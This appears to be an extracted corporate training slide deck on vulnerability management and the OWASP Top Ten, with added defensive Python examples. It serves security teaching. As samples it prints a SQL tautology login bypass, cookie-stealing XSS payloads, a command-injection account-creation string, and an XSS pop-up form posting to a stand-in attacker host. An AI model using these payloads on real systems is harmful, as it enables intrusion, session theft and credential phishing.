
Security Vulnerability Management


7/30/2019 Security Vulnerability Management

http://slidepdf.com/reader/full/security-vulnerability-management 1/50


CONFIDENTIAL© Copyright 2008 Wipro Ltd 1

Vulnerability Management

[email protected] – COE, Wipro Technologies

Proactive Security

Whoever is first in the field and awaits the coming of the enemy, will be fresh for the fight; whoever is second in the field and has to hasten to battle will arrive exhausted.

-- Sun-Tzu, "The Art of War"

Why is Security Testing Important?

"A few lines of code can wreak more havoc than a bomb."

What is Vulnerability?

In computer security, the word vulnerability refers to a weakness in a system allowing an attacker to violate the confidentiality, integrity, availability, access control, consistency or audit mechanisms of the system or the data and applications it hosts. Vulnerabilities may result from bugs or design flaws in the system.

Vulnerability

A vulnerability is a hole or a weakness in the system, which can be a design flaw, an implementation bug etc., that allows an attacker to cause harm to the stakeholders of the system. Stakeholders include the application owner, administrators, users, and other entities that rely on the system.

There are two sources of vulnerabilities:
- Weaknesses in the information technology (IT) products as supplied by the vendor(s)
- Weaknesses in the ways organizations manage and use the technology

IT Product Vulnerabilities

- The number of vulnerabilities in IT products discovered each year is increasing dramatically. According to CERT, 140 vulnerabilities were reported in 1995 and 4,129 vulnerabilities were reported in 2002. A vulnerability represents a weakness in a product that can be exploited in some way to help an attacker achieve the objective of compromising a system.

There are two types of IT product vulnerabilities:
- Vulnerabilities resulting from system architecture, e.g. operating system architecture. These are difficult to correct.
- Vulnerabilities resulting from low-level design or implementation errors, e.g. bugs in programs. These are easier to correct.
- In either case, IT product vulnerabilities are often long-lived, with many Internet-connected systems vulnerable to a particular form of attack many months after vendors produce corrections to the vulnerability that was exploited by the attack.

Weaknesses in Management and Operational Practice

- The major source of vulnerability includes weaknesses in the management and operational practices of system operators.

Factors that lead to weaknesses in operational practices include:
- Lack of, ambiguous or poorly enforced organizational security policies and regulations; security roles and responsibilities that are not clearly defined, or lack of accountability
- Failure to account for security when outsourcing IT services
- Lack of security awareness training for all levels of staff
- Poor account management or password management by all users
- Poor physical security leading to open access to important computers and network devices
- Weak configuration management practices that allow for vulnerable configurations
- Weak authentication practices that allow attackers to masquerade as valid system users
- Lack of vulnerability management practices that require system administrators to quickly correct important vulnerabilities
- Failure to use strong encryption when transmitting sensitive information over the network
- Lack of monitoring and auditing practices that can detect attacker behavior before damage is done

Weaknesses

- Weaknesses in any of these areas open the doors for attackers and give them opportunities to take advantage of the weaknesses to achieve their goals.
- Managing the risk associated with this category of vulnerability requires that organizations dedicate resources to the risk management task.
- Operations must be continuously assessed and corrective actions taken when needed.

Vulnerability Classifications, Categorizations and Severity Levels

Vulnerability Classification

- Active Vulnerability: an active vulnerability is one which was identified in the previous assessment(s) as well as in the current vulnerability assessment.
- New Vulnerability: a new vulnerability is one which was identified for the first time in the current vulnerability assessment and was not present in the previous assessment(s) results.
- Re-opened Vulnerability: a re-opened vulnerability is one which was identified in an earlier vulnerability assessment(s), then fixed, and is again identified in the current assessment.
- Fixed Vulnerability: a fixed vulnerability is one which was identified in previous vulnerability assessment(s) and fixed before the current assessment, and is therefore identified as fixed (non-existing) in the current assessment.
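The four classes above amount to a set comparison between the previous and current assessment results. The Python below is an added example, not code from the deck or from Wipro; it assumes a finding is identified by an (asset, check) pair and that the set of findings fixed in earlier cycles is carried forward, and the sample results are constructed.

```python
from collections import Counter

# Finding identity is (asset, vulnerability check), so the same check on two
# hosts is tracked as two findings.  Sample data below is constructed.
ACTIVE, NEW, REOPENED, FIXED = "active", "new", "re-opened", "fixed"


def classify_findings(previous_open, previous_fixed, current):
    """Assign each finding one of the four classes defined on the slide.

    previous_open:  findings reported (confirmed or potential) in the last assessment
    previous_fixed: findings reported in an earlier assessment and since recorded as fixed
    current:        findings reported by the current assessment
    Returns {finding: class}.  Findings fixed earlier and still absent are not re-listed.
    """
    result = {}
    for finding in current:
        if finding in previous_open:
            result[finding] = ACTIVE      # seen last time and seen again
        elif finding in previous_fixed:
            result[finding] = REOPENED    # was closed, has come back
        else:
            result[finding] = NEW         # first sighting
    for finding in previous_open:
        if finding not in current:
            result[finding] = FIXED       # open last time, gone now
    return result


def roll_forward(previous_fixed, classes):
    """Fixed set to carry into the next cycle: everything fixed earlier that has
    not been re-opened, plus whatever was classified as fixed this cycle."""
    still_fixed = {f for f in previous_fixed if classes.get(f) != REOPENED}
    fixed_now = {f for f, c in classes.items() if c == FIXED}
    return still_fixed | fixed_now


def summarize(classes):
    """Counts per class, the figures a trend report would carry."""
    return dict(Counter(classes.values()))


# Constructed sample: three hosts across two assessment cycles.
PREVIOUS_OPEN = {("web01", "directory browsing"), ("web01", "SSLv2 enabled")}
PREVIOUS_FIXED = {("db01", "anonymous FTP")}
CURRENT = {
    ("web01", "directory browsing"),   # still there -> active
    ("db01", "anonymous FTP"),         # fixed earlier, back again -> re-opened
    ("mail01", "open mail relay"),     # never seen before -> new
}


def demo():
    classes = classify_findings(PREVIOUS_OPEN, PREVIOUS_FIXED, CURRENT)
    return classes, summarize(classes), roll_forward(PREVIOUS_FIXED, classes)


if __name__ == "__main__":
    classes, counts, next_fixed = demo()
    for (asset, check), cls in sorted(classes.items()):
        print(f"{asset:7} {check:20} {cls}")
    print(counts)
```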

Vulnerability Classifications, Categorizations and Severity Levels

Confirmed Vulnerability

- A vulnerability whose existence is confirmed is called a confirmed vulnerability. Vulnerabilities can exist in several areas of a network, such as in firewalls, FTP servers, web servers, operating systems or CGI bins.

Potential Vulnerability

- A vulnerability whose existence could not be confirmed is called a potential vulnerability. The only way to verify the existence of such a vulnerability on the network would be to perform an intrusive scan, which could result in a denial of service. Whether to do so is again a call to be taken by the vulnerability assessment team.

3 security levels

The confirmed and potential vulnerabilities can be further classified into 3 security levels based on their impact on the systems:

- Low: Intruders can collect information about the host, such as the OS installed, open ports, services etc.
- Medium: Intruders can collect sensitive information from the host, including security settings. This could result in potential misuse of the host by intruders. For example, vulnerabilities at this level may include partial disclosure of file contents, access to certain files on the host, directory browsing, disclosure of filtering rules and security mechanisms, denial of service attacks, and unauthorized use of services, such as mail relaying.
- High: Intruders can gain control of the host, which can lead to the compromise of entire network security. For example, vulnerabilities at this level may include full read and write access to files, remote execution of commands, and the presence of backdoors.

Vulnerability Management

To overcome the growing risk posed by vulnerabilities, an organization must develop a formal vulnerability management program addressing the entire life cycle of vulnerability management as shown in FIG A. All of these must be supported by an underlying foundation of people, process and technology initiatives.

[FIG A – Vulnerability Management Lifecycle (figure not reproduced): stages Asset Management, Vulnerability Assessment, Prioritization of assets, Remediation, Monitoring and Reporting; labelled flows include asset profile, asset update, vulnerabilities list, prioritized asset list, report information and a detailed report on vulnerability management]

Asset Management

- To get a confident start to a VM process it is very important to have an accurate inventory and profile of what the infrastructure contains. For an organization of any significant size, this inventory will be complex and constantly changing as new components are added and existing components are retired. The steps below aid in making a comprehensive asset inventory:
- Identification of assets can be done either manually, or by using an automated tool such as asset management software
- Discovered assets must be reviewed to determine business criticality and risk tolerance
- All technologies or software running on these assets must be identified at a specific version level
- All patches and system configurations applied to these technologies must be identified on an asset-by-asset basis
- The individuals accountable for the assets must be identified

Vulnerability Assessment

- Once the identification of the network assets is done, a vulnerability assessment should be carried out to find the vulnerabilities existing in the network. Many software tools exist that can aid in the discovery (and sometimes removal) of vulnerabilities in a computer system.
- Examples of vulnerability scanner tools:
  - Retina Network Security Scanner
  - QualysGuard
  - GFI LANguard Network Security Scanner
  - Nessus Vulnerability Scanner
- Though these tools can provide a good overview of the possible vulnerabilities present, they cannot replace human judgment. Relying solely on scanners will yield false positives and a limited-scope view of the problems present in the system. Therefore, a proper vulnerability assessment process should use vulnerability scanner tools to identify potential vulnerabilities and then carry out a detailed vulnerability analysis to remove false positives. Finally, a report should be generated that lists all the vulnerabilities found in the vulnerability assessment process.

Prioritization of Assets

- After identification of vulnerabilities in the assets, the next step is to rate each asset. The owners of the assets have to rate their assets based on how critical each asset, or the information contained on that asset, is to the business, and on the severity levels of the vulnerabilities found in the asset that may compromise the system.
- The highest priority assets should be scanned regularly for vulnerabilities.
- The prioritization process enables businesses to notify asset owners when vulnerabilities are discovered and to rank the severity of those exposures. It also helps businesses to understand and define an acceptable level of risk and how each risk affects the technology and business activities of the company.
- This model can then be communicated to staff in business, technical and behavioral terms, so that all employees understand what will be expected of them when vulnerabilities are fixed.

Remediation

- Remediation is the most important step in the VM process. Hence care should be taken to prevent any unwanted changes taking place because of the remediation process.
- Steps for the remediation process:
  - A risk threshold should be defined, and all the vulnerabilities with a risk level below the threshold should be accepted
  - For risk levels above the threshold value a specific remediation plan must be defined for each asset or asset group
  - Testing of the remediation prior to implementation is required
  - Specific vulnerability remedies must be deployed
  - Documentation that a vulnerability remedy has been applied to an asset must be kept for audit purposes

Monitoring

- Detecting and fixing vulnerabilities does not offer a complete solution. Organizations need to continuously monitor and track the latest vulnerabilities and their corresponding fixes.
- Ongoing verification of vulnerability remedies, identification of current technology, and patch and configuration inventories for each asset must be performed
- The progress of the vulnerability management process must be measured to verify and monitor that an organization's risk exposure is managed

Vulnerability Management Products

- There are many players in the market who offer vulnerability management products, but one should carefully evaluate those products against the parameters mentioned in the vulnerability management lifecycle before zeroing in on a specific product. Some of the well-known vulnerability management products are:
  - McAfee Foundstone on Demand Service
  - CA eTrust Vulnerability Manager
  - NetIQ Vulnerability Manager
  - Symantec Vulnerability Assessment
  - Symantec Enterprise Security

Why Find Vulnerabilities?

- Nobody believes their software is vulnerable
  - "If the software works, then it must be secure"
- Finding flaws starts you on the path

[Diagram: a cycle of Find Flaws -> Fix -> Find Flaws -> Improve -> Find Flaws -> Improve]

If you're not finding them, you're allowing them

Software Is A Black Box

- Complex
  - Millions of lines of code
  - Layers of leaky abstractions
  - Massively interconnected
- Compiled
  - Difficult to reverse engineer
  - Different on every platform
- Legal Protections
  - No peeking
  - We're not liable

Key Vulnerabilities

- A few serious common vulnerabilities...
  - Broken Access Control
  - Weak Authentication and Session Management
  - SQL Injection
  - Cross Site Scripting
- For more information see...
  - The Top Ten Most Critical Web Application Vulnerabilities (www.owasp.org/documentation/topten.html)
  - A Guide to Building Secure Web Applications and Web Services (www.owasp.org/documentation/guide.html)

SQL Injection Illustrated

[Diagram: an HTTP request passes through the firewall, the hardened OS, the web server and the app server into the custom code, which sends a SQL query to the DB table; the HTTP response flows back the same way. Back-end components shown: databases, legacy systems, web services, directories, human resources, billing. Business functions shown: accounts, finance, administration, transactions, communication, knowledge management, e-commerce. The application attack is at the application layer, not the network layer.]

"SELECT * FROM users WHERE user='' OR 1=1--' AND pass='password'"

1. Application presents a login form to the attacker
2. Attacker sends an attack in the form data
3. Application forwards the attack to the database in a SQL query
4. Database runs the query containing the attack and sends results to the application
5. Application thinks the login worked and sends the welcome page: Successful Login, "Welcome, Alice"
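The query on the slide is exactly what string concatenation produces when the user field holds ' OR 1=1-- . The Python/sqlite3 below is an added example, not code from the deck or from Wipro: it runs that concatenated login beside a parameterized one against a constructed two-row users table, so the tautology matches the first row in the vulnerable version and nothing in the safe one.

```python
import sqlite3

# Constructed toy table for this example.  Real applications must never keep
# plaintext passwords (see A8 Insecure Storage later in the deck); the point
# here is the shape of the query, not the credential store.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_concatenated(conn, user, password):
    """Step 3 on the slide: form data is pasted straight into the SQL text.
    Returns the user name the database matched, or None."""
    sql = f"SELECT user FROM users WHERE user='{user}' AND pass='{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, user, password):
    """Same query with bound parameters: the driver passes the values out of
    band, so quotes and '--' in the input stay data and never become SQL."""
    row = conn.execute("SELECT user FROM users WHERE user=? AND pass=?",
                       (user, password)).fetchone()
    return row[0] if row else None


# The slide's form data: user field "' OR 1=1--", password field "password".
SLIDE_USER = "' OR 1=1--"
SLIDE_PASSWORD = "password"


def demo():
    conn = make_db()
    return (login_concatenated(conn, SLIDE_USER, SLIDE_PASSWORD),   # 'alice'
            login_parameterized(conn, SLIDE_USER, SLIDE_PASSWORD),  # None
            login_parameterized(conn, "bob", "hunter2"))            # 'bob'


if __name__ == "__main__":
    vuln, safe, legit = demo()
    print("concatenated :", vuln)    # tautology matches the first row: Welcome, Alice
    print("parameterized:", safe)    # no row has that literal user name
    print("bob/hunter2  :", legit)   # real credentials still work
```

The concatenated statement is the slide's WHERE user='' OR 1=1--' AND pass='password'; the -- comments out the password check, so step 5's "Welcome, Alice" is just the first row of the table.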

Scanning for SQL Injection

- Method
  - Use "signatures" to send malformed SQL commands
  - Analyze responses to see if it "worked"
  - Nessus, nikto
- Pros
  - Requires only network access to the application
  - Fast and easy to run
- Cons
  - May only exercise part of an application
  - Prone to false alarms and missed positives
  - Results indicate the URL but not the line of code
  - Can be problems with credentials, roles, and SSL

Static Analysis for SQL Injection

- Method
  - Automatically analyze source code for patterns
  - Tools load source code, compile, and analyze
- Pros
  - Requires only the software baseline
  - Fast and easy to run
- Cons
  - Can't factor in the runtime environment
  - Prone to false alarms and missed positives
  - Results indicate the line of code but not the URL
  - Doesn't find design problems

Penetration Testing for SQL Injection

- Method
  - Custom attacks by an expert security tester
  - Use OWASP WebScarab to craft custom attacks
  - Expert analyzes responses to see if the attack worked
- Pros
  - Open source tools available
  - Recommend an internal team
- Cons
  - Requires expertise in security, software, and SQL
  - Difficult to exercise the entire application
  - Tester may not be able to determine success

Code Review for SQL Injection

- Method
  - Reviewer analyzes code for patterns
  - Use tools to view the baseline in different ways
  - Examine mechanisms, common vulnerability areas
- Pros
  - Cost-effective
  - Can examine the entire baseline
- Cons
  - Can't factor in the runtime environment
  - Requires skills in software and security

A Change In Perspective

- Think like an attacker!
  - Understand how the application works
  - Especially the security mechanisms
  - How does the application make security decisions?
- The easy part?
  - Test and analyze for a single vulnerability
- The hard part?
  - Do an entire application for all types of vulnerabilities

Getting Started

- Adopt the OWASP Top Ten
  - Set the bar
- Spot check a few applications
  - Are your security mechanisms easy to understand?
  - Are you doing validation, error handling, logging, etc.?
- Get security out in the open!
- Come to my talk later to find out more!!!

OWASP Can Help

- Open Web Application Security Project
  - Nonprofit Foundation
  - All materials available under approved open source licenses
  - Dozens of projects, over 50 chapters worldwide, thousands of participants, and millions of hits a month

OWASP is dedicated to finding and fighting the causes of insecure software

OWASP Supports Vulnerability Analysis

- OWASP Top Ten
  - Set priorities, get management buy-in
- OWASP Guide
  - 300 page book for application security
- OWASP Testing Guide
  - Test/analysis methods for application security
- OWASP WebScarab
  - Web application & web service penetration tool

OWASP Top Ten Most Critical Web Application Security Vulnerabilities

- A1. Unvalidated Input
- A2. Broken Access Controls
- A3. Broken Authentication and Session Management
- A4. Cross Site Scripting Flaws
- A5. Buffer Overflows
- A6. Injection Flaws
- A7. Improper Error Handling
- A8. Insecure Storage
- A9. Denial of Service
- A10. Insecure Configuration Management

A1. Unvalidated Input

- Definition: Information from web requests is not validated before being used by a web application. Attackers can use these flaws to attack backend components through a web application.
- Test: insert all possible values for parameters: GET, POST, hidden fields, cookies, HTTP headers, ...
- Automated tools: do this very well, but lack classification of the errors returned

A1. Unvalidated Input

- How to detect: examine the result (and NOT the error codes) and identify vulnerabilities
  - SQL Injection: parse for SQL error codes :S
  - No exception handling: parse for stack traces?
  - Authorization bypass: is that an Admin button?
  - Buffer overflow (Denial-of-Service?): empty HTML page?
  - LDAP Injection: different user attributes?
  - ...
- Ultimate test: exploit the vulnerability MANUALLY -> THIS REQUIRES THE TESTER TO KNOW THE ATTACK PAYLOAD
- What about non-English web applications?

Unvalidated Input

- "SQL Injection"
  - an attacker provides malformed data
  - the application uses that data to build a SQL statement using string concatenation
- "Command Injection"
  - untrusted data is placed into data
  - passed to some sort of compiler or interpreter, where the data might, if it's formatted in a particular way, be treated as something other than data
- "Cross-Site Scripting"

A2. Broken Access Controls

- Definition: Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access other users' accounts, view sensitive files, or use unauthorized functions.
- Test: log in with valid accounts with different privileges and attempt to access protected parts such as URLs, Struts actions, hidden fields, ...
- Automated tools: can guess known URIs like /admin but do this within the existing user context or as an anonymous user
- What I want: the expected output should be an authorization matrix: user A can access URI A, user B cannot access URI B, ... like a sitemap but with authorization levels

Broken Access Control

- "Improper File Access"
  - There are three common security issues:
    - Race conditions occur when a file has been checked for security but then something adverse could happen to the file before actual use
      - time of check; time of use (TOCTOU)
    - Code opens a file expecting the file to contain normal file contents, but instead it is a link to another file or a device name
    - Attackers have control over a file that they shouldn't have, allowing them to read and potentially overwrite sensitive information

A3. Broken Authentication and Session Management

- Definition: Account credentials and session tokens are not properly protected. Attackers that can compromise passwords, keys, session cookies, or other tokens can defeat authentication restrictions and assume other users' identities.
- Test: analyse the authentication mechanism: is HTTPS used, secure cookie, random session ID, ...
- Automated tools: do this out of the box

Broken Authentication and Session Management

- "Use of Magic URLs and Hidden Form Fields"
  - Magic URLs
    - URLs that contain sensitive information or information that could lead an attacker to sensitive information
  - Hidden form fields
    - Malicious users could view the form contents, hidden or not, by using the View Source option in their browsers, and then create malicious versions to send to the server

A4. Cross Site Scripting Flaws

- Definition: The web application can be used as a mechanism to transport an attack to an end user's browser. A successful attack can disclose the end user's session token, attack the local machine or spoof content to fool the user.
- Test: use RSnake's cheat sheet for XSS filter evasion (http://ha.ckers.org/xss.html)
- Automated tools: some tools inject a limited XSS pattern, and for some tools you don't know what they inject and you CAN'T change it. But if you have a web site with 1000 forms they are very useful to automate the injection. But ... if you find 1 XSS, you will probably find more :)

Cross Site Scripting

- "Cross-Site Scripting"
  - a web application takes input from a user but fails to validate the input
  - the input is echoed directly in a web page
  - the input could be malicious JavaScript; when echoed and interpreted in the destination browser, any number of issues could result

Cross-Site Scripting

- What is it?: The web application is used to store, transport, and deliver malicious active content to an unsuspecting user.
- Root Cause: Failure to proactively reject or scrub malicious characters from input vectors.
- Impact: Persistent XSS is stored and executed at a later time, by a user. It allows cookie theft, credential theft, and data confidentiality, integrity, and availability risks. Browser hijacking and unauthorized access to the web application are possible using existing exploits.
- Solution: A global as well as form- and field-specific policy for handling untrusted content. Use white lists and regular expressions to ensure input data conforms to the required character set, size, and syntax.
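The solution bullet above, a global policy plus field-specific white lists checked with regular expressions, and escaping on the way out, as an added Python example that is not code from the deck or from Wipro; the field names, patterns and sample requests are constructed for illustration.

```python
import html
import re

# Constructed per-field policy (the slide's "Form and Field specific policy"):
# the allowed character set, size and syntax for each input vector of a form.
FIELD_POLICY = {
    "username": re.compile(r"[A-Za-z0-9_]{3,20}"),
    "zip": re.compile(r"[0-9]{5}"),
    "comment": re.compile(r"[A-Za-z0-9 .,!?'-]{1,200}"),
}


def validate_form(form):
    """Global policy: every submitted field must have a white list, and must
    match it in full.  Returns {field: reason}; an empty dict means accept."""
    errors = {}
    for name, value in form.items():
        pattern = FIELD_POLICY.get(name)
        if pattern is None:
            errors[name] = "unexpected field"          # no policy -> refuse, don't pass through
        # fullmatch rather than a '^...$' search: '$' also matches just before a
        # trailing newline, so 'alice\n' would slip past a '^...$' pattern.
        elif not pattern.fullmatch(value):
            errors[name] = "outside allowed character set, size or syntax"
    return errors


def render_greeting(username):
    """Output side: what reaches the page is HTML-escaped, so a value that
    somehow bypassed validation is still rendered as text, not markup."""
    return "<p>Welcome, " + html.escape(username, quote=True) + "</p>"


# Constructed requests: one clean, one carrying a script tag, one with a
# trailing newline, one with a field the form does not define.
CLEAN = {"username": "alice", "zip": "94105", "comment": "Works fine, thanks!"}
SCRIPT = {"username": "<script>alert(1)</script>", "zip": "94105", "comment": "hi"}
NEWLINE = {"username": "alice\n", "zip": "94105", "comment": "hi"}
EXTRA = {"username": "alice", "zip": "94105", "comment": "hi", "debug": "1"}


def demo():
    return (validate_form(CLEAN), validate_form(SCRIPT),
            validate_form(NEWLINE), validate_form(EXTRA))


if __name__ == "__main__":
    for label, errs in zip(("clean", "script", "newline", "extra"), demo()):
        print(f"{label:8} {errs or 'accepted'}")
    print(render_greeting("<b>alice</b>"))
```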

Unvalidated Input (A1) with XSS (A4)

[Screenshot slides not reproduced] Unvalidated input resulted in a Cross-Site Scripting attack and the theft of the Administrator's cookie.

Cross-Site Scripting: Content Spoofing

- Insert untrusted content into the web application that can be used to trick users.
- Compromise of the integrity of application code via malicious script code injected into the database
- Limited only by the attacker's imagination.

Cross-Site Scripting Exploit

<SCRIPT>var oWH = window.open("","","width=275,height=175, top=200, left=250 location=no, menubar=no,status=no, toolbar=no, scrollbars=no,resizable=no");oWH.document.write("
  [HTML FORM with POST request to http://compromised-server/h4xor.php]
");</SCRIPT>

Buffer Overflow

- "Buffer Overruns"
  - if the application writes beyond the bounds of an array allocated on the stack, the attacker gets to specify control information
- "Format String Problems"
  - data from untrusted users is used as the format string. As a result, attackers can write strings in the data processing language to cause many problems
- "Integer Overflows"
  - errors range from crashes and logic errors to escalation of privilege and execution of arbitrary code
  - the result isn't what you'd get with pencil and paper

A6. Injection Flaws

- Definition: Web applications pass parameters when they access external systems or the local operating system. If an attacker can embed malicious commands in these parameters, the external system may execute those commands on behalf of the web application.
- Test: replace every parameter with command injection strings, which depend on the operating system in use
- Automated tools: some tools inject command injection patterns, but with some tools you don't know what they inject and it is impossible to change them. But if you have a web site with 1000 forms they are very useful to automate the injection
- Results: the output of the command injection must be obtained; how to automate this? E.g. Net user /add Erwin

Injection Flaws

- Web applications pass parameters when they access external systems or the local operating system.
- If an attacker can embed malicious commands in these parameters, the external system may execute those commands on behalf of the web application.
  - "SQL Injection"
  - "Command Injection"

Example: SQL Tautology Injection

Submitting SQL query logic instead of a valid date can expose confidential records. [Screenshot slides not reproduced]

A7. Improper Error Handling

- Definition: Error conditions that occur during normal operation are not handled properly. If an attacker can cause errors to occur that the web application does not handle, they can gain detailed system information, deny service, cause security mechanisms to fail, or crash the server.
- Test: corrupt parameters and look for propagating exceptions
- Automated tools: by default
- Result: how to classify an uncaught exception? This depends on the exception

Improper Error Handling

- "Failing to Handle Errors"
  - Yielding too much information
  - Ignoring errors
  - Misinterpreting errors
  - Using useless error values
  - Handling the wrong exceptions
    - Not capturing the correct error
  - Handling all exceptions
    - hiding errors by simply pretending the exception never happened

A8. Insecure Storage

- Definition: Web applications frequently use cryptographic functions to protect information and credentials. These functions and the code to integrate them have proven difficult to code properly, frequently resulting in weak protection.
- Test: attempt to access configuration files via forceful browsing (e.g. web.xml), examine cookies and parameters, dump passwords from the database via SQL Injection
- Automated tools: are unable to exploit vulnerabilities in order to find passwords
- "Failing to Store and Protect Data Securely"
  - permissions required to access the data
  - data encryption issues
  - threats to stored secrets


A9. Denial of Service

§ Definition: Attackers can consume web application resources to a point where other legitimate users can no longer access or use the application. Attackers can also lock users out of their accounts or even cause the entire application to fail.

§ Test: attempt to brute-force accounts, performance test, …

§ Automated tools: have no problem attacking accounts; they don’t execute performance tests, but attacking a site with full force can have unexpected side effects

§ “DoS”

• Consume web application resources to a point where other legitimate users can no longer access or use the application

• Attackers can also lock users out of their accounts or even cause the entire application to fail.

• Many DoS attacks are mitigated through infrastructure, such as firewalls and use of quotas.
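The slide's two points about accounts, that brute force must be limited and that a lockout can itself be used to lock legitimate users out, pull in opposite directions. The Python quota below is an added example (not from the deck) of the second mitigation the slide names: a sliding-window quota on failed logins keyed by source address and account together, rather than a permanent lock on the account alone. The `ManualClock`, the `LoginThrottle` API and the `simulate` replay helper are all constructed for this illustration.

```python
import time
from collections import defaultdict, deque


class ManualClock:
    """Constructed clock so the example runs deterministically; a real deployment
    would pass time.monotonic instead."""

    def __init__(self):
        self.now = 0.0

    def advance(self, seconds):
        self.now += seconds

    def __call__(self):
        return self.now


class LoginThrottle:
    """Quota on failed logins keyed by (source address, account).

    A hard lockout keyed on the account alone turns the brute-force defence into a
    denial-of-service tool: anyone can lock a victim out by guessing wrong on purpose.
    Keying on the source as well, and using a sliding window instead of a permanent
    lock, slows guessing without handing out that lockout.
    """

    def __init__(self, max_failures=5, window_seconds=300, clock=time.monotonic):
        self.max_failures = max_failures
        self.window = window_seconds
        self.clock = clock
        self._failures = defaultdict(deque)  # (source, account) -> timestamps of failures

    def _recent(self, key):
        now = self.clock()
        q = self._failures[key]
        while q and now - q[0] > self.window:
            q.popleft()  # forget failures that fell out of the window
        return q

    def allowed(self, source, account):
        return len(self._recent((source, account))) < self.max_failures

    def record_failure(self, source, account):
        self._failures[(source, account)].append(self.clock())

    def record_success(self, source, account):
        self._failures.pop((source, account), None)


def simulate(throttle, attempts):
    """Replay constructed attempts (source, account, password_correct) and return the
    outcome of each: 'ok', 'denied' (wrong password) or 'throttled' (quota exhausted,
    so the password was not even checked)."""
    outcomes = []
    for source, account, correct in attempts:
        if not throttle.allowed(source, account):
            outcomes.append("throttled")
        elif correct:
            throttle.record_success(source, account)
            outcomes.append("ok")
        else:
            throttle.record_failure(source, account)
            outcomes.append("denied")
    return outcomes
```

In the replay, six wrong guesses for one account from one address produce five denials and then a throttled attempt, while the account's owner logging in from a different address is still accepted; once the window has passed, the throttled source is allowed to try again.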


A10. Insecure Configuration Management

§ Definition: Having a strong server configuration standard is critical to a secure web application. These servers have many configuration options that affect security and are not secure out of the box.

§ Test: use Google to retrieve vulnerabilities about the SUT and try to exploit them

§ Automated tools: can test automatically for these vulnerabilities, and are very useful when they have a built-in update function

§ “Web and Application Server Security”

• strong server configuration standard is critical

• many configuration options affect security


Warnings…

§ Using the techniques learned from the OWASP tools could lead to job termination, financial liability, and/or criminal penalties.

• Hacking is illegal

• Hacking may be considered terrorism


Can (Automated) Testing Tools Really Find the OWASP Top 10?

§ In order to find vulnerabilities in web applications we need to identify them:

• Via code audit: a lot of work

• Via testing: manual or automated

§ Manual testing: a human being attacks a web application using his experience, knowledge and tools (open-source, self-made, IE :-))

§ Automated testing: a human being uses an automated vulnerability scanner to attack a web application


Testing

§ There is no standard to test web applications

• How to test for vulnerabilities

• Different types of payloads that must be used, e.g. <script>alert(document.cookie)</script> vs <body onload=alert(document.cookie)>

• What should be the result of a test: how to detect a pop-up window in an HTML stream?

• What should not be the result of a test: will a script tag embedded in another script tag really get executed?
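One practical answer to the "how to detect a pop-up window in an HTML stream" question is that a scanner does not look for the pop-up at all: it replaces the alert() in the payload with a unique marker and parses the response to see whether that marker landed in a context a browser would execute. The Python below is an added example of such a test oracle, not code from the deck or from any of the tools it names; it uses the two payload shapes from the slide with a constructed marker, a constructed vulnerable page renderer, and a hardened renderer that HTML-encodes the reflected value.

```python
import html
from html.parser import HTMLParser

CANARY = "xss7f3a"  # constructed marker; a real test would use a random token per request

# The two payload shapes from the slide, with alert(document.cookie) replaced by the
# marker so the oracle has something unambiguous to look for.
PAYLOADS = [
    f"<script>{CANARY}</script>",
    f"<body onload={CANARY}>",
]


def render_vulnerable(name):
    """Constructed page that reflects the parameter unencoded (the defect under test)."""
    return f"<html><body><h1>Hello {name}</h1></body></html>"


def render_safe(name):
    """Same page with the parameter encoded for an HTML text context."""
    return f"<html><body><h1>Hello {html.escape(name, quote=True)}</h1></body></html>"


class _ExecContextFinder(HTMLParser):
    """Flags the marker when it ends up where a browser would execute it: inside a
    <script> element, or as the value of an on* event-handler attribute."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.hit = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        for attr, value in attrs:
            if attr.startswith("on") and value and CANARY in value:
                self.hit = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # Entity-encoded text such as &lt;script&gt; arrives here as plain data with
        # in_script False, so an encoded reflection is correctly not flagged.
        if self.in_script and CANARY in data:
            self.hit = True


def reflected_executable(response):
    """True if the marker is reflected in an executable context in the response."""
    finder = _ExecContextFinder()
    finder.feed(response)
    finder.close()
    return finder.hit


def probe_renderer(render):
    """Run each payload through a page renderer and report, per payload, whether it
    landed in an executable context."""
    return {payload: reflected_executable(render(payload)) for payload in PAYLOADS}
```

Run against `render_vulnerable` both payloads are flagged; against `render_safe` neither is, because the encoded text reaches the parser as character data rather than as a tag or attribute. The oracle only judges context, so it does not settle the slide's last question about nested script tags: whether a given browser actually executes such a construct has to be checked in the browser.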


Testing

§ OWASP Testing Guide is a framework and a guideline, not a technical step-by-step guide

§ OSSTMM - Open Source Security Testing Methodology Manual: more detailed, but at a network/OS level rather than a web app level

§ No education or recognized certifications for security testing


Testing

§ People have different backgrounds:

• Network security: how experienced are they in XML parsing, AJAX, SQL, …

• Functional testers: how do they know what a security vulnerability is? How can they exploit a vulnerability?

• Developers: hate to test or audit code

• Application security expert: has the experience and the knowledge of the three groups above, but is a rare species

§ Conclusion:

• Everyone has a different approach to testing

• Automated tools also have a different approach


Automated Tools – Open-source

§ For free

§ Run on multi-platforms, thank you Java

§ No or very limited reporting

§ Usage-mode: expert security tester

§ Examples: Oedipus, Paros, Burp Intruder, WebScarab Fuzzer, Spike, E-Or, …


Automated Tools - Commercial

§ Not cheap: license is application, server or network based

§ Very good reporting capabilities

§ Run only on Windows

§ Usage-mode: typical Next – Next clicking usage, but expertise in application security and in the tool is required for optimal results

§ Examples: Cenzic HailStorm, SPI Dynamics WebInspect, Sanctum AppScan, Acunetix, NTOspider, …


Some questions

§ Is the Top 10 about vulnerabilities, attacks or bad coding practices?

§ How to differentiate the different classifications?

• Unvalidated Input (A1) is a vulnerability, XSS (A4) is an attack against this vulnerability

• Same for A5, A6 and A7

§ How to define a test plan for the OWASP Top 10?

§ What are the payloads to discover the Top 10? E.g. 10000000 X or 10000000 A for buffer overflow?


Automated Tools

§ Automated Tools are not the silver bullet to test for the OWASP Top 10

§ They can help a security tester to assess a web application faster

§ Security tester must master the tools and know the limitations

§ Combine open-source tools with commercial tools

